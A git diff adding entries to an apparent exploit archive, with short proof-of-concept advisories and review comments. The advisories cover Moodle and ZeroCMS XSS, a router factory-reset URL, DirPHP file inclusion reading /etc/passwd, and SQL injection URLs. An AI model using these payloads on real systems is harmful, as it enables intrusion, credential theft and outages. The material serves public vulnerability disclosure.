diff --git a/files.csv b/files.csv index 56f2b2d15..c3fefc86b 100755 --- a/files.csv +++ b/files.csv @@ -30775,3 +30775,11 @@ id,file,description,date,author,platform,type,port 34166,platforms/php/webapps/34166.txt,"KubeSupport 'lang' Parameter SQL Injection Vulnerability",2010-06-18,"L0rd CrusAd3r",php,webapps,0 34167,platforms/win32/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,metasploit,win32,local,0 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 +34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0 +34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting Vulnerability",2014-07-27,"Mayuresh Dani",php,webapps,0 +34172,platforms/hardware/webapps/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,webapps,0 +34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI Vulnerability",2014-07-27,"black hat",php,webapps,0 +34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS 'news.php' Multiple SQL Injection Vulnerabilities",2010-06-21,"Th3 RDX",php,webapps,0 +34176,platforms/php/webapps/34176.html,"osCmax 2.0 'articles.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0 +34177,platforms/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS 'copy_folder.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0 +34179,platforms/jsp/webapps/34179.txt,"IBM WebSphere ILOG JRules 6.7 Cross Site Scripting Vulnerability",2010-06-21,IBM,jsp,webapps,0 diff --git a/platforms/hardware/webapps/34172.txt b/platforms/hardware/webapps/34172.txt new file mode 100755 index 000000000..2d392f3b7 --- /dev/null +++ b/platforms/hardware/webapps/34172.txt 
@@ -0,0 +1,30 @@ +# Title : Sagem F@st 3304-V1 denial of service Vulnerability +# Vendor Homepage : http://www.sagemcom.com +# Tested on : Firefox, Google Chrome +# Tested Router : Sagem F@st 3304-V1 +# Date : 2014-07-26 +# Author : Z3ro0ne +# Contact : saadousfar59@gmail.com +# Facebook Page : https://www.facebook.com/Z3ro0ne + +# Vulnerability description : +the Vulnerability allow unauthenticated users to remotely restart and reset the router +# Exploit: + + +SAGEM FAST3304-V1 DENIAL OF SERVICE + +
+ +
+
+ +
+ + +Reset to factory configuration : +--- Using Google Chrome browser : +to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar + + + diff --git a/platforms/jsp/webapps/34179.txt b/platforms/jsp/webapps/34179.txt new file mode 100755 index 000000000..5b29d165c --- /dev/null +++ b/platforms/jsp/webapps/34179.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/41030/info + +IBM WebSphere ILOG JRules is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +The issue affects version 6.7. + + +The following example input to the URI is available: +?? \ No newline at end of file diff --git a/platforms/php/remote/34160.txt b/platforms/php/remote/34160.txt index 49ce22bf2..ba08178e8 100755 --- a/platforms/php/remote/34160.txt +++ b/platforms/php/remote/34160.txt @@ -291,3 +291,5 @@ print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET print sys.exit() + +##EDB-Note: Web server has to be able to interpret .php5 files \ No newline at end of file diff --git a/platforms/php/webapps/34169.txt b/platforms/php/webapps/34169.txt new file mode 100755 index 000000000..0b2fd90b4 --- /dev/null +++ b/platforms/php/webapps/34169.txt 
@@ -0,0 +1,24 @@ +Title: Moodle 2.7 Persistent XSS +Vendor: https://moodle.org/ +Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265 +Researched by: Osanda Malith Jayathissa (@OsandaMalith) +E-Mail: osanda[cat]unseen.is +Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/ + +[-] POC +================ + +1. Edit your profile +2. Click Optional +3. In Skype ID field inject this payload + +x" onload="prompt('XSS by Osanda')">" + +[-] Disclosure Timeline +======================== + +2014-05-24: Responsibly disclosed to the Vendor +2014-05-27: Suggested a fix +2014-06-04: Fix got accepted +2014-07-21: Vendor releases a security announcement +2014-07-24: Released Moodle 2.7.1 stable with all patches \ No newline at end of file diff --git a/platforms/php/webapps/34170.txt b/platforms/php/webapps/34170.txt new file mode 100755 index 000000000..e0cb418c3 --- /dev/null +++ b/platforms/php/webapps/34170.txt 
@@ -0,0 +1,54 @@ +###################### +# Exploit Title: Persistent ZeroCMS Cross-Site Scripting Vulnerability + +# Discovered by: Mayuresh Dani + +# Vendor Homepage: http://www.aas9.in/zerocms/ + +# Software Link: https://github.com/pcx1256/zerocms/archive/master.zip + +# Version: 1.0? + +# Date: 2014-07-25 + +# Tested on: Windows 7 / Mozilla Firefox + Ubuntu 14.04 / Mozilla Firefox + +# CVE: CVE-2014-4710 + +###################### + +# Vulnerability Disclosure Timeline: + +2014-06-15: Discovered vulnerability +2014-06-23: Vendor Notification (Support e-mail address) +2014-07-25: Public Disclosure + +# Description + +ZeroCMS is a very simple Content Management System Built using PHP and +MySQL. + +The application does not validate any input to the "Full Name", "Email +Address", "Password" or "Confirm Password" functionality. It saves this +unsanitized input in the backend databased and executes it when visiting +the subsequent or any logged-in pages. + +###################### + +# Steps to reproduce the vulnerability + +1) Visit the "Create Account" page (eg. +http://localhost/zerocms/zero_transact_user.php) + +2) Enter your favourite XSS payload and click on "Create Account" + +3) Enjoy! + +More information: +https://community.qualys.com/blogs/securitylabs/2014/07/24/yet-another-zerocms-cross-site-scripting-vulnerability-cve-2014-4710 + +##################### + +Thanks, +Mayuresh. diff --git a/platforms/php/webapps/34173.txt b/platforms/php/webapps/34173.txt new file mode 100755 index 000000000..de749046a --- /dev/null +++ b/platforms/php/webapps/34173.txt @@ -0,0 +1,12 @@ +# Exploit Title: DirPHP - version 1.0 Local File Inclusion +# Google Dork: intext:DirPHP - version 1.0 - Created & Maintained by Stuart +Montgomery +# Date: 7/26/14 +# Exploit Author: -Chosen- +# Contact: dark[dot]binary[dot]code@gmail.com +# Version: DirPHP - Version 1.0 +# Tested on: *nix + +PoC: + +http://site.com/path/index.php?phpfile=/etc/passwd 
diff --git a/platforms/php/webapps/34175.txt b/platforms/php/webapps/34175.txt new file mode 100755 index 000000000..ebb751843 --- /dev/null +++ b/platforms/php/webapps/34175.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/40995/info + +SaffaTunes CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/cms/news.php?id=9[CODE] +http://www.example.com/cms/news.php?year=2010[CODE] \ No newline at end of file diff --git a/platforms/php/webapps/34176.html b/platforms/php/webapps/34176.html new file mode 100755 index 000000000..bc4840611 --- /dev/null +++ b/platforms/php/webapps/34176.html @@ -0,0 +1,44 @@ +source: http://www.securityfocus.com/bid/40998/info + +osCmax is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +osCMax 2.0.25 is vulnerable; other versions may also be affected. + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ diff --git a/platforms/php/webapps/34177.txt b/platforms/php/webapps/34177.txt new file mode 100755 index 000000000..489b33084 --- /dev/null +++ b/platforms/php/webapps/34177.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/41000/info + +Sigmer Technologies Scribe CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +https://www.example.com/path/copy_folder.php?path=SITE/%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file
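Review bot: In the files.csv hunk, the new row for 34173 gives the author as "black hat", but the header of the added platforms/php/webapps/34173.txt says "# Exploit Author: -Chosen-". Align the CSV author column with the file header (or correct the header if the CSV is right). In the same hunk, the 34176 row is titled "osCmax 2.0" while the added file states "osCMax 2.0.25 is vulnerable", so the title should carry the full version string.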
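Review bot: In platforms/hardware/webapps/34172.txt, the header names the device under "# Tested Router" but records no firmware version, so a reader cannot tell which builds accept the unauthenticated SubmitMaintCONFIG request and which do not. Add a firmware/version field next to "# Tested Router" so owners of this model can check their exposure against it.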
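Review bot: In platforms/jsp/webapps/34179.txt, the last line after "The following example input to the URI is available:" is just "??", which looks like an encoding loss from the original advisory. As committed, the sentence promises an example that is not there; restore the text from the cited securityfocus source with the correct encoding or drop the sentence. The file also ends without a trailing newline.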
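Review bot: In platforms/php/remote/34160.txt, the added "##EDB-Note: Web server has to be able to interpret .php5 files" sits after the final sys.exit() at line 295, where a reader skimming the header for prerequisites will not see it. Move the note to the header block at the top of the file, and end the file with a newline.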
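Review bot: In platforms/php/webapps/34169.txt, the fixed release appears only in the last timeline line ("2014-07-24: Released Moodle 2.7.1 stable with all patches") and the affected version only in the title. Add explicit affected/fixed version fields to the header so the remediation target is visible without reading the timeline. The file also lacks a trailing newline.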
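Review bot: In platforms/php/webapps/34170.txt, the header reads "# Version: 1.0?" while the files.csv row in this same patch asserts "ZeroCMS 1.0" without qualification. Either confirm the version and drop the question mark, or mark the CSV title as unverified so the two agree. Minor: "backend databased" in the description should read "backend database".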
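Review bot: In platforms/php/webapps/34173.txt, the "# Google Dork:" header line is wrapped so that "Montgomery" lands on its own line without the "#" prefix, which breaks the comment-style header block. Rejoin it onto one line. The date is also written "7/26/14" where the other entries in this patch use ISO dates (for example "2014-07-26"); use the same format here.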